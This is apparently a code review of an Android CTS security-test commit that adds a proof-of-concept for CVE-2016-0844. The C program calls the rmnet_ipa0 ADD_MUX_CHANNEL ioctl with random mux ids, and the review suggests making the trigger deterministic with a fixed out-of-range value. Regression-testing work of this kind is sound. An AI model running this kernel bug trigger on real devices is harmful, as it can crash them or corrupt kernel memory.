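Review bot: `local_poc.h` copies three separate kernel UAPI headers (the IPA QMI service types, `msm_ipc`, and `msm_rmnet`) but `poc.c` only consumes the rmnet section — `RMNET_IOCTL_EXTENDED`, `RMNET_IOCTL_ADD_MUX_CHANNEL`, `struct rmnet_ioctl_extended_s` and `IFNAMSIZ` — plus the two IPA request structs named in `poc.c`'s unused `WAN_IOC_*` macros. Since the ioctl hands `struct rmnet_ioctl_extended_s` to the driver by address, a layout that drifts from the target kernel's copy would make the driver read some other field as the mux id and the test would silently stop exercising the bug, so the header should say where it came from, e.g. `/* Copied from the kernel's uapi/linux/msm_rmnet.h (and msm_ipc.h); field layout must match the device kernel. */`, and the unused IPA/QMI and IPC-router sections are better dropped. Minor: the Apache header at the top of this file reads `permissions vand` where it should read `permissions and` (the same typo is in `poc.c`).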
diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c b/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c
new file mode 100644
index 00000000000..12427684710
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c
@@ -0,0 +1,79 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions vand
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <net/if.h>
+#include <net/if_arp.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/ioctl.h>
+#include <sys/prctl.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <time.h>
+#include <unistd.h>
+#include "local_poc.h"
+
+#define WAN_IOC_MAGIC 0x69
+#define WAN_IOCTL_ADD_FLT_RULE 0
+#define WAN_IOCTL_ADD_FLT_INDEX 2
+#define WAN_IOC_ADD_FLT_RULE \
+ _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_RULE, \
+ struct ipa_install_fltr_rule_req_msg_v01 *)
+
+#define WAN_IOC_ADD_FLT_RULE_INDEX \
+ _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_INDEX, \
+ struct ipa_fltr_installed_notif_req_msg_v01 *)
+
+int trigger(int sfd, char *ifname) {
+ int ret;
+ struct ifreq ifr;
+ unsigned cmd = RMNET_IOCTL_EXTENDED;
+ strlcpy(ifr.ifr_name, ifname, IFNAMSIZ);
+ struct rmnet_ioctl_extended_s extendata;
+ int i;
+ ifr.ifr_ifru.ifru_data = &extendata;
+ extendata.extended_ioctl = RMNET_IOCTL_ADD_MUX_CHANNEL;
+ for (i = 0; i < 3; i++) {
+ extendata.u.rmnet_mux_val.mux_id = rand();
+ printf("[-] call ioctl %d\n", i);
+ if (ioctl(sfd, cmd, &ifr) < 0) {
+ printf("%s, %s\n", __func__, strerror(errno));
+ ret = -1;
+ }
+ }
+
+ return ret;
+}
+
+int main() {
+ int sockfd;
+ char *ifname = "rmnet_ipa0";
+
+ srand(time(NULL));
+
+ if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
+ printf("socket = %d, %s\n", sockfd, strerror(errno));
+ exit(1);
+ }
+
+ trigger(sockfd, ifname);
+ return 0;
+}
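Review bot: `ret` in `trigger()` is declared without an initializer and is returned when every ioctl succeeds, which is undefined behavior and returns stack garbage; it also means the `-Wall -Werror` build may fail on toolchains that diagnose the maybe-uninitialized return. In the same function neither `ifr` nor `extendata` is zeroed, so `rmnet_mux_val.vchannel_name` is uninitialized stack memory handed to the driver — for a regression test that should be deterministic rather than whatever the stack held. The `WAN_IOC_ADD_FLT_RULE*` macros above `trigger()` are never used and can go. If the underlying defect is an unchecked `mux_id` index (the advisory text is not reproduced in this change, so verify), consider adding one fixed out-of-range value such as `0xFFFFFFFFu` to the loop so the repro does not depend on `rand()` seeded from `time(NULL)`; `main()` ignoring `trigger()`'s return is presumably fine because the host-side harness watches the device, not the exit status.
```c
int trigger(int sfd, char *ifname) {
  int ret = 0; /* was uninitialized: returned garbage when every ioctl succeeded */
  struct ifreq ifr;
  struct rmnet_ioctl_extended_s extendata;
  unsigned cmd = RMNET_IOCTL_EXTENDED;
  int i;
  memset(&ifr, 0, sizeof ifr);
  memset(&extendata, 0, sizeof extendata); /* vchannel_name is no longer stack garbage */
  strlcpy(ifr.ifr_name, ifname, IFNAMSIZ);
  ifr.ifr_ifru.ifru_data = &extendata;
  extendata.extended_ioctl = RMNET_IOCTL_ADD_MUX_CHANNEL;
  /* … unchanged: ioctl loop … */
  return ret;
}
```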
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_04.java b/hostsidetests/security/src/android/security/cts/Poc16_04.java
index 5d033751c0a..d3da9357393 100644
--- a/hostsidetests/security/src/android/security/cts/Poc16_04.java
+++ b/hostsidetests/security/src/android/security/cts/Poc16_04.java
@@ -30,4 +30,12 @@ public class Poc16_04 extends SecurityTestCase {
String logcat = AdbUtils.runCommandLine("logcat -d", getDevice());
assertNotMatches("[\\s\\n\\S]*IOMX_InfoLeak b26323455[\\s\\n\\S]*", logcat);
}
+
+ /**
+ * b/26324307
+ */
+ @SecurityTest
+ public void testPocCVE_2016_0844() throws Exception {
+ AdbUtils.runPoc("CVE-2016-0844", getDevice(), 60);
+ }
}
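Review bot: The javadoc on `testPocCVE_2016_0844` cites only `b/26324307` while the commit tracks both `b/72509609` and `b/26324307`, and it says nothing about what the PoC exercises or how failure is detected; a reader of this file cannot tell that the test presumably passes only if the device survives the `rmnet_ipa` ioctl run, since `runPoc` is called with no assertion after it. Suggest `/** b/26324307, b/72509609 — CVE-2016-0844: RMNET_IOCTL_ADD_MUX_CHANNEL with arbitrary mux ids on rmnet_ipa0; the harness, not this method, decides pass/fail. */` with the second clause confirmed against `SecurityTestCase`. If this branch's `@SecurityTest` annotation accepts a `minPatchLevel`, tagging it with the 2016-04 bulletin would match the `AndroidTest.xml` section the binary is pushed from.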